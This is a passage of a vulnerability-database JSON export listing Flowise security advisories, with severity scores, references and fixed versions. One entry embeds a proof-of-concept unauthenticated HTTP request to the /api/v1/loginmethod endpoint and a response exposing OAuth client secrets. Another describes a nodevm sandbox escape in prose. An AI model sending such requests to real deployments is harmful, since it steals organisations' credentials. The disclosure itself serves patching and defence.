            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the password reset functionality on cloud.flowiseai.com sends a reset password link over the unsecured HTTP protocol instead of HTTPS. This behavior introduces the risk of a man-in-the-middle (MITM) attack, where an attacker on the same network as the user (e.g., public Wi-Fi) can intercept the reset link and gain unauthorized access to the victim’s account. This vulnerability is fixed in 3.1.0.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41275",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00038",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11586",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41275"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41275",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41275"
                },
                {
                    "reference_url": "https://hackerone.com/reports/1888915",
                    "reference_id": "1888915",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:29:42Z/"
                        }
                    ],
                    "url": "https://hackerone.com/reports/1888915"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x5w6-38gp-mrqh",
                    "reference_id": "GHSA-x5w6-38gp-mrqh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x5w6-38gp-mrqh"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5w6-38gp-mrqh",
                    "reference_id": "GHSA-x5w6-38gp-mrqh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:29:42Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5w6-38gp-mrqh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "CVE-2026-41275",
                "GHSA-x5w6-38gp-mrqh"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-71uq-yx2j-cqak"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212306?format=api",
            "vulnerability_id": "VCID-8vsg-mxay-gkf7",
            "summary": "Duplicate Advisory: FlowiseAI Pre-Auth Arbitrary Code Execution",
            "references": [
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164",
                    "reference_id": "CVE-2025-57164",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3g4j-r53p-22wx",
                    "reference_id": "GHSA-3g4j-r53p-22wx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3g4j-r53p-22wx"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv",
                    "reference_id": "GHSA-7944-7c6r-55vv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api",
                    "purl": "pkg:npm/flowise@3.0.6",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-39aw-3gc6-bkgb"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-abyp-yn76-1yfp"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-jmps-anck-eqdt"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-qgs1-hazv-67b8"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        },
                        {
                            "vulnerability": "VCID-zwz7-byj4-6qan"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6"
                }
            ],
            "aliases": [
                "GHSA-3g4j-r53p-22wx"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8vsg-mxay-gkf7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212767?format=api",
            "vulnerability_id": "VCID-9bht-svq8-87b4",
            "summary": "Flowise has Insufficient Password Salt Rounds",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5665",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/5665"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x2g5-fvc2-gqvp",
                    "reference_id": "GHSA-x2g5-fvc2-gqvp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x2g5-fvc2-gqvp"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp",
                    "reference_id": "GHSA-x2g5-fvc2-gqvp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api",
                    "purl": "pkg:npm/flowise@3.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13"
                }
            ],
            "aliases": [
                "GHSA-x2g5-fvc2-gqvp"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9bht-svq8-87b4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359914?format=api",
            "vulnerability_id": "VCID-a1e4-f5dh-w3a5",
            "summary": "Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request\n### Summary\nI have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.\n\n\n### PoC\nThe following request can be sent by anyone on the internet without any cookies or authorization headers.\n\nRequest\n```http\nGET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2\nHost: cloud.flowiseai.com\nAccept: application/json\nContent-Type: application/json\n```\n\nResponse: The server returns 200 OK with sensitive credentials:\n```json\n{\n  \"providers\": [\n    {\n      \"id\": \"a04ba769-b810-481d-8d6b-84f8c377dea5\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"azure\",\n      \"config\": {\n        \"tenantID\": \"\",\n        \"clientID\": \"\",\n        \"clientSecret\": \"\"\n      },\n      \"status\": \"disable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    },\n    {\n      \"id\": \"eda8bd90-1c45-4aca-933f-3a53d9be4161\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"google\",\n      \"config\": {\n        \"clientID\": \"123455\",\n        \"clientSecret\": \"123455\"\n      },\n      \"status\": \"enable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    },\n    {\n      \"id\": 
\"0d238df0-c89c-4733-bf57-6ec06f58c7e7\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"auth0\",\n      \"config\": {\n        \"domain\": \"\",\n        \"clientID\": \"\",\n        \"clientSecret\": \"\"\n      },\n      \"status\": \"disable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    },\n    {\n      \"id\": \"e060ae88-c7f4-4b7c-9bdc-5321963a1648\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"github\",\n      \"config\": {\n        \"clientID\": \"\",\n        \"clientSecret\": \"\"\n      },\n      \"status\": \"disable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    }\n  ],\n  \"callbacks\": [\n    {\n      \"providerName\": \"azure\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/azure/callback\"\n    },\n    {\n      \"providerName\": \"google\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/google/callback\"\n    },\n    {\n      \"providerName\": \"auth0\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/auth0/callback\"\n    },\n    {\n      \"providerName\": \"github\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/github/callback\"\n    }\n  ]\n}\n```\n### Affected Deployments\n- FlowiseAI Cloud (cloud.flowiseai.com)\n- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed\n\n### Impact\nAn unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. 
This leads to complete compromise of the organization's third-party integrations and potential data breaches.",
            "references": [
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6pcv-j4jx-m4vx",
                    "reference_id": "GHSA-6pcv-j4jx-m4vx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6pcv-j4jx-m4vx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api",
                    "purl": "pkg:npm/flowise@3.1.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0"
                }
            ],
            "aliases": [
                "GHSA-6pcv-j4jx-m4vx"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a1e4-f5dh-w3a5"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/110150?format=api",
            "vulnerability_id": "VCID-abyp-yn76-1yfp",
            "summary": "Flowise versions 3.0.1 up to but not including 3.0.8, and all later versions with 'ALLOW_BUILTIN_DEP' enabled, contain an authenticated remote code execution vulnerability and a node VM sandbox escape due to insecure use of integrated modules (Puppeteer and Playwright) within the nodevm execution environment. An authenticated attacker able to create or run a tool that leverages Puppeteer/Playwright can specify attacker-controlled browser binary paths and parameters. When the tool executes, the attacker-controlled executable/parameters are run on the host and circumvent the intended nodevm sandbox restrictions, resulting in execution of arbitrary code in the context of the host. This vulnerability was incorrectly marked as a duplicate of CVE-2025-26319 by the developers and should be considered distinct from that identifier.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34267",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.01665",
                            "scoring_system": "epss",
                            "scoring_elements": "0.82497",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34267"
                },
                {
                    "reference_url": "https://flowiseai.com",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://flowiseai.com"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5231",
                    "reference_id": "5231",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/pull/5231"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34267",
                    "reference_id": "CVE-2025-34267",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34267"
                },
                {
                    "reference_url": "https://flowiseai.com/",
                    "reference_id": "flowiseai.com",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/"
                        }
                    ],
                    "url": "https://flowiseai.com/"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages",
                    "reference_id": "flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages"
                },
                {
                    "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w",
                    "reference_id": "GHSA-5w3r-f6gm-c25w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-14T20:32:58Z/"
                        }
                    ],
                    "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r4hh-pcgx-j5r2",
                    "reference_id": "GHSA-r4hh-pcgx-j5r2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r4hh-pcgx-j5r2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api",
                    "purl": "pkg:npm/flowise@3.0.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-14af-nhf3-aqba"
                        },
                        {
                            "vulnerability": "VCID-17k4-psgt-sydg"
                        },
                        {
                            "vulnerability": "VCID-19jc-umg6-v7ce"
                        },
                        {
                            "vulnerability": "VCID-1xfp-4rtg-4bcu"
                        },
                        {
                            "vulnerability": "VCID-3gp6-wwtd-kkf1"
                        },
                        {
                            "vulnerability": "VCID-488c-vrqu-f7hf"
                        },
                        {
                            "vulnerability": "VCID-5pup-kgaf-3ubw"
                        },
                        {
                            "vulnerability": "VCID-6ufs-d346-d7ev"
                        },
                        {
                            "vulnerability": "VCID-71uq-yx2j-cqak"
                        },
                        {
                            "vulnerability": "VCID-9bht-svq8-87b4"
                        },
                        {
                            "vulnerability": "VCID-a1e4-f5dh-w3a5"
                        },
                        {
                            "vulnerability": "VCID-affy-v76q-fub6"
                        },
                        {
                            "vulnerability": "VCID-aqg8-6us7-uqef"
                        },
                        {
                            "vulnerability": "VCID-b97u-efzx-dffn"
                        },
                        {
                            "vulnerability": "VCID-bkmk-k9mn-ekhx"
                        },
                        {
                            "vulnerability": "VCID-d4wa-szeh-43ab"
                        },
                        {
                            "vulnerability": "VCID-dtss-epth-z7fh"
                        },
                        {
                            "vulnerability": "VCID-dzed-27rk-3qav"
                        },
                        {
                            "vulnerability": "VCID-e65e-s5sd-kuhp"
                        },
                        {
                            "vulnerability": "VCID-ejdc-j73x-jydk"
                        },
                        {
                            "vulnerability": "VCID-fu6t-9dk4-jbh9"
                        },
                        {
                            "vulnerability": "VCID-gvpx-4wkw-43cz"
                        },
                        {
                            "vulnerability": "VCID-hkfs-v3bp-kbh5"
                        },
                        {
                            "vulnerability": "VCID-j5hh-haj2-qydg"
                        },
                        {
                            "vulnerability": "VCID-jcze-eg2c-mkcf"
                        },
                        {
                            "vulnerability": "VCID-k579-xd81-hqdu"
                        },
                        {
                            "vulnerability": "VCID-ksmv-s6c9-t7ap"
                        },
                        {
                            "vulnerability": "VCID-m3j3-4u39-euht"
                        },
                        {
                            "vulnerability": "VCID-pzza-9xq9-a7de"
                        },
                        {
                            "vulnerability": "VCID-rgmv-6bqh-eqf2"
                        },
                        {
                            "vulnerability": "VCID-tdm1-91mc-8kgr"
                        },
                        {
                            "vulnerability": "VCID-v1nz-wwsu-qycg"
                        },
                        {
                            "vulnerability": "VCID-v9hg-7pex-g3dp"
                        },
                        {
                            "vulnerability": "VCID-w9yr-5jbp-q7fm"
                        },
                        {
                            "vulnerability": "VCID-ywgu-76cy-uqe7"
                        },
                        {
                            "vulnerability": "VCID-zwna-stj5-3yhm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8"
                }
            ],
            "aliases": [
                "CVE-2025-34267",
                "GHSA-r4hh-pcgx-j5r2"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-abyp-yn76-1yfp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66317?format=api",
            "vulnerability_id": "VCID-affy-v76q-fub6",
            "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30822",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00455",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64279",
                            "published_at": "2026-06-11T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30822"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30822",
                    "reference_id": "CVE-2026-30822",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
